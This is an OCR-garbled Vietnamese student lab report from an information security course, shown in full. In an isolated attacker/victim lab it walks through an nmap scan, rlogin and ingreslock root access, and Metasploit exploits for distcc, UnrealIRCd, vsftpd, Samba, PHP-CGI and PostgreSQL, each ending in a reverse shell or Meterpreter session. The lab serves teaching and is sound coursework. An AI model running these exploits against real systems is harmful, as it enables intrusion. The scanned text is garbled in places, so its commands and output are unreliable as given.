Cơ sở an toàn thông tin bài thực hành 1

Not shown: 65509 closed ports STATE SERVICE open ftp open ssh open telnet open smtp open http open rpcbind open netbios-ssn open microsoft-ds open exec open login open shell open rmiregi

HOC VIEN CONG NGHE BUU CHINH VIEN THONG

KHOA CHAT LUQNG CAO

CO SO AN TOAN THONG TIN

Bài thực hành 1

Họ và tên sinh viên : NGUYÊN LÊ ANH TÚ

Mã sinh viên : B2IDCCN75I

Lớp : E2ICQCN03-B

Muc luc

Câu 1: Tìm hiểu lý thuyết - 2 ST T1 121 1 1012121211 ru 3

LÊN: on 3 Cầu 2: Nội dung thực hành: 0 0 220112211121 112 2112211127112 1H11 HH 3 ,G,.2.;) 00nn8ÀeaaAỪỪ 3

Câu 1: Tìm hiểu lý thuyết

a metasploIt

¢ Su dung cong cu Metasploit dé khai thác các lỗ hông đã biết qua các công dịch vụ

®_ Sử dụng các lệnh/chương trỉnh như:

o ifconfig: hién thi/thay déi cai dat giao dién mang

© nmap: cong cu quét công dịch vụ

© metaspoilt: céng cụ hễ trợ tấn công

Câu 2: Nội dung thực hành:

a metasploit

® Tim dia chi ip voi lénh “ifconfig”

ubuntu(@attacker: ~ File Edit View Search Terminal Help

ubuntu@attacker:~$ ipconfig

-bash: ipconfig: command not found

ubuntu@attacker:~S 1fconfiqg

ethO: fLags=4163<UP ,BROADCAST ,RUNNING ,MULTICAST> mtu 1500

inet 192.168.1.3 netmask 255.255.255.0 broadcast 192.168.1.255

ether 02:42:c0:a8:01:03 txqueuvelen © (Ethernet)

RX packets 69 bytes 8924 (8.7 KiB)

RX errors © dropped @ overruns © frame 0

TX packets 0 bytes 0 (0.0 B)

TX errors © dropped 8 overruns 8 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536

inet 127.0.0.1 netmask 255.0.0.0

loop txqueuelen 1000 (Local Loopback)

RX packets 9 bytes 6 (6.9 B)

RX errors 9 dropped 9 overruns 09 frame 0

TX packets 0 bytes 9 (0.0 B)

TX errors © dropped 0 overruns 0 carrier © collisions 0

ubuntu@attacker:~$ S

File Edit View Search Terminal Help

ubuntu@victim:~§ ifconfig

etho Link encap:Ethernet HWaddr 02:42:c0:a8:01:02

inet addr:192.168.1.2 Bcast:192.168.1.255 Mask:255.255.255.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:59 errors:0 dropped:© overruns:0 frame:0

TX packets:26 errors:0 dropped:® overruns:® carrier:0

collisions:0 txqueuvelen:0

RX bytes:7523 (7.3 KB) TX bytes:3018 (2.9 KB)

Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

UP LOOPBACK RUNNING MTU:65536 Metric:1

RX packets:73 errors:0 dropped:® overruns:0 frame:0

TX packets:73 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txquevelen:1000

RX bytes:23013 (22.4 KB) TX bytes:23013 (22.4 KB)

ubuntu@vtctim:~$ S

® ping từ attacker đến victim

ubuntu@attacker: ~ File Edit View Search Terminal Help

25 packets transnittted, 25 received, 0% packet Loss, time 24571ms

rtt min/avg/max/mdev = 0.039/0.051/0.076/0.008 ms

ubuntu@attacker:~$ ping 192.168.1.2

PING 192.168.1.2 (192.168.1.2) 56(84) bytes of data

bytes from 192.168.1.2: tcmp_seq=1 ttl=64 time=0.079

bytes from 192.168 icmp_seq=4 li, 2

bytes from 192.168 icmp_seq=7 ttl=64 time=0.077

bytes from 192.168 icmp_seq=8 ttl=64 time=0.063

bytes from 192.168

bytes from 192.168

bytes from 192.168

bytes from 192.168

bytes from 192.168

bytes from 192.168

tcmp_seq=12 ttL=z64 tne=9.1160

ttl=64 time=0.243 r ttl=64 time=0.070 icmp_seq=19 ttl=64 time=0.068

1

kì

kì

1

1: iG

bytes from 192.168.1.2: icmp_seq=11 tine=9 967

kì

a |

1

1

1

¢ dùng nmap để quét các công dịch vụ có thể tấn công

rtt min/avg/max/mdev = 0.062/0.081/0.243/0.031 ms

ubuntu@attacker:~$ nmap -pô-65535 192.168.1.2

Starting Nmap 7.89 ( https://nmap.org ) at 2024-03-19 14:54 UTC

Nmap scan report for metasploit.victim.student.lan (192.168.1.2)

Host is up (0.000053s latency)

Not shown: 65509 closed ports

STATE SERVICE

open ftp

open ssh

open telnet

open smtp

open http

open rpcbind

open netbios-ssn

open microsoft-ds

open exec

open login

open shell

open rmiregistry

open ingreslock

open ccproxy-ftp

open mysql

open distccd

open postgresql

open vnc

open Xil1

open irc

open ircs-u

open ajpi3

open unknown

open msgsrvr

open unknown

open unknown

open unknown

© khai thac dich vu rlogin

Nmap done: 1 IP address (1 host up) scanned in 9.96 seconds

ubuntu@attacker:~$ rlogin -1 root 192.168.1.2

Last login: Tue Mar 19 10:50:02 EDT 2024 from :0.0 on pts/2

Linux victim 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64

The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable Law

To access official Ubuntu documentation, please visit:

http: //help.ubuntu.conm/

bol aT

root@victim:~# cat /root/filetoview txt

# Filename: filetoview txt

#

# Description: This is a pre-created file for each student (victim) container

# This file is modified when container is created

# The string below will be replaced with a keyed hash

My string is: 3731f24ee1c780b60d412137d0d0f317

root@victin: ~#

© khai thac dich vu ingreslock

ubuntu@attacker:~$ telnet 192.168.1.2 1524

Trying 192.168.1.2

Connected to 192.168.1.2

Escape character is '*]'

root@victim:/# cat /root/filetoview txt

cat /root/filetoview.txt

cat /root/filetoview.txt

Filename: filetoview.txt

Description: This is a pre-created file for each student (victim) container

This file is modified when container is created

The string below will be replaced with a keyed hash

My string is: 3731f24ee1c780b60d412137ded0f317

root@vtct1m: /#

e Su dung céng cu Metasploit, khai thac cac dich vu: distecd, IRC daemon, VSFtpd, Samba service, HTTP, Postgres

4 a

exit

Connection closed by foreign host

ubuntu@attacker:~$ msfconsole

[-] ***rting the Metasploit Framework console |

[-] * WARNING: No database support: No database YAML file

[-] ***

- \§$$$$L ; ;==aaccaacc%#s$b d8, LÍ

#SSSSSSSSSSSSSSSSSSSSSSSSSSSb a) Et: )

L2 ^ ?

PES S331 ttt ae 2): 88b ` ?8888P

.a§$SS$S$SP — er rere ere

KD ¿“2Ú oe -aqscusssssssssssssssssssssesssess"

,aŠ$###SSP` _.,-ass#SS$S$35$S55$$5555$5$$555$$$555S$$55##6#6#s55S"

Tớ ee á ( {CC C

+

À

;;LLL&&ã& '

tttta'

1

=[ ose spe hệt - 1074 auxiliary - 330 post

556 pay\oads - 45 encoders - 19 nops

=[ 556 payloads - 45 encoders - 10 nops

=[ 4 evasion

5 > search distccd

Disclosure Date Rank Check Description

ton

msf5 > use exploit/unix/misc/distcc_exec

msf5 exploit(unix/misc/distcc_exec) > options

Module options (exploit/unix/misc/distcc_exec):

Tul Current Setting Required Description

RHOSTS The target address range or CIDR identifier

Exploit target:

Id Name

6 Automatic Target

msf5 exploit(unix/misc/distcc_exec) > set RHOST 192.168.1.2

RHOST => 192.168.1.2

msf5 exploit(unix/misc/distcc exec) >

msf5 exploit(unix/misc/distcc_exec) > set RHOST 192.168.1.2

RHOST => 192.168.1.2

msfS exploit(unix/misc/distcc_exec) > exploit

Started reverse TCP double handler on 192.168.1.3:4444

Accepted the first client connection

Command: echo CkkhSpkp41Prfk7Z;

Writing to socket A

Reading from sockets

Reading from socket B

B: "Ckkh5pkp41IPrfK7Z\r\n”

Matching

A is input

Command shell session 1 opened (192.168.1.3:4444 -> 192.168.1.2:60256) at 2024-03-19 15:09:55 +0

000

cat /root/filetoview txt

cat /root/ftLetovtew txt

# Filename: filetoview.txt

#

# Description: This is a pre-created file for each student (victim) container

# This file is modified when container is created

# The string below will be replaced with a keyed hash

My string is: 3731f24ee1c780b60d412137d0d0f317

Matching Modules

8.1 Backdoor Command Execution

msf5 > use expLloit/unix/irc/unreal_ircd_3281_backdoor

msfS exploit(untx/irc/unreal_ircd_3281_backdoor) >

nsf5 exptott(untx/trc/unreatL_trcd 3281_backdoor) > opttons

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

Nane Current Setting Required Description

Exptott target:

Id Name

9 Automattc Target

nsf5 explott(unix/irc/unreal_ircd_3281_backdoor) > set RHOST 192.168.1.2

RHOST => 192.168.1.2

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > |

msfS explott(unix/irc/unreal_ircd_3281_backdoor) > exploit

Started reverse TCP double handler on 192.168.1.3:4444

192.168.1.2:6667 - Connected to 192.168.1.2:6667

:irc.Metasplottable.LAN NOTICE AUTH :*** Looking up your hostname

192.168.1.2:6667 - Sending backdoor command

Accepted the first client connection

Accepted the second client connection

Command: echo BHMYoL LuMvwJMqS0;

Writing to socket A

Reading from sockets

Reading from socket B

B: ”“BHMYoLTuMvw3MqS®\r\n”

Matching

A is input

Command shell session 1 opened (192.168.1.3:4444 -> 192.168.1.2:60266) at 2024-03-19 15:15:27 +0 li) 2)

cat /root/filetoview.txt

txt

# Filename: filetoview.txt

#

# Description: This is a pre-created file for each student (victim) container

# This file is modified when container is created

# The string below will be replaced with a keyed hash

My string is: 3731f24ee1c780b60d412137d0d0f317

Disclosure Date Rank Check Description

r Command Execution

> use exploit/unix/ftp/vsftpd_234_ backdoor

5 explott(unix/ftp/vsftpd_234_ backdoor) > options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description

Exploit target:

msf5 explott(unix/ftp/vsftpd_234 backdoor) > set RHOST 192.168.1.2

RHOST => 192.168.1.2

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > Jj

msf5 explott(unix/ftp/vsftpd_234_ backdoor) > set RHOST 192.168.1.2

RHOST => 192.168.1.2

msf5 exploit(unix/ftp/vsftpd_234_ backdoor) > exploit

192.168.1.2: - Banner: 220 (vsFTPd 2.3.4)

192.168.1.2: - USER: 331 Please specify the password

192.168.1.2: - Backdoor service has been spawned, handling

192.168.1.2:21 - UID: uid=O(root) gid=0(root)

Found shell

Command shell session 1 opened (192.168.1.3:43749 -> 192.168.1.2:6200) at 2024-03-19 15:29:08 +0

600

cat /root/filetoview.txt

# Filename: filetoview.txt

#

# Description: This is a pre-created file for each student (victim) container

# This file is modified when container is created

# The string below will be replaced with a keyed hash

“a string is: 3731f24ee1c780b60d412137ded0f317

Matching Modules

ipt" Command Execution

nsf5 > use expLott/muLti/samba/usermap_script

nsf5 exploit(multi/samba/usermap_script) > options

Module options (exploit/multi/samba/usermap_ script):

Current Setting Required Description

Exploit target:

Id Name

8 Automatic

msfS exploit(multi/samba/usermap_script) > set RHOST 192.168.1.2

RHOST => 192.168.1.2

msf5 exploit(multi/samba/usermap_script)

msf5 explott(multt/samba/usermap_script) set RHOST 192.168.1.2

RHOST => 192.168.1.2

msf5 exploit(multi/samba/usermap_script) exploit

Started reverse TCP double handler on 192.168.1.3:4444

Accepted the first client connection

Accepted the second client connection

Command: echo RSOtiSOFXmsaL9qz;

Writing to socket A

Readtnq from sockets

Readtng from socket A

A: “sh: Line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nRS6t15Đ aL9qz\r\n”

Matching

B is input

Command shell session 1 opened (192.168.1.3:4444 -> 192.168.1.2:60286) at 2024-03-19 15:37:28 +0

tolls)

cat /root/filetoview.txt

# Filename: filetoview.txt

#

# Description: This is a pre-created file for each student (victim) container

# This file is modified when container is created

# The string beLow wt1L be repLaced with a keyed hash

My string is: 3731f24ee1c780b60d412137d0d0f317

10

Matching Modules

Injection

msf5 > use exploit/multi/http/php_cgi_arg_injection

msfS exploitt(multi/http/php_cgi_arg_injection) > opttons

Module options (exploit/multi/http/php_cgi_arg_injection):

3

RHOSTS

RPORT

18

TARGETURI

URIENCODING

VHOST

The target address range or CIDR identifier The target port (TCP)

Negotiate SSL/TLS for outgoing connections The URI to request (must be a CGI-handled PHP script) Level of URI URIENCODING and padding (0 for minimum) HTTP server virtual host

Exploit target:

Id Name

9 Automattc

msf5 exploit(multi/http/php_cgi_arg injection) > J

RHOST => 192.168.1

sf5 exploit(multi/http/php_cgi_arg_injection) > exploit

sf5 exploit(multi/http/php_cgi_arg_injection) > set RHOST 192.168.1.2

2

Started reverse TCP handler on 192.168.1.3:4444

Sending stage (38247 bytes) to 192.168.1.2

Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.2:60296) at 2024-03-19 15:47:16 +000

eterpreter > cat /root/filetoview txt

FiLenane: f11etoview.txt

Description: This is a pre-created file for each student (victim) container

# This file is modified when container is created

The string below will be replaced with a keyed hash

y string is: 3731f24ee1c780b60d412137d0d0f317

eterpreter >

11

Matching Modules

finux Payload Execution

1 exploit/windows/postgres/postgres_payload 2009-04-10 excetLtent Yes PostgreSQL for M iicrosoft Windows Payload Execution

\sf5 > use exp1ott/L1inux/postgres/postgres_pay1oad

sfS explott(linux/postgres/postgres payload) > options

odule options (exploit/lLinux/postgres/postgres_payload):

rrent Setting Required Description

PASSWORD postgres The password for the specified username Leave blank for a r

dom password

Exploit target:

Id Name

8 Linux x86

sf5 exptott(1inux/postgres/postgres_payLoad) >

msf5 exploit(linux/postgres/postgres_payload) > set RHOST 192.168.1.2

RHOST => 192.168.1.2

msf5 exploit(linux/postgres/postgres_payload) > exploit

Started reverse TCP handler on 1 168.1.3:4444

192.168.1.2:5432 - PostgreSQL 8.3.1 on 1486-pc-Linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)

Uploaded as /tmp/emaJchgN.so, should be cleaned up automatically

Sending stage (985320 bytes) to 192.168.1.2

Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.2:60304) at 2024-03-19 15:53:24 +000

9

neterpreter > cat /root/ftLetovtew.txt

# Filename: filetoview.txt

#

# Description: This is a pre-created file for each student (victim) container

# This file is modified when container is created

# The string below will be replaced with a keyed hash

My string is: 3731f24ee1c780b60d412137d0d0f317

meterpreter >

® Checkwork

12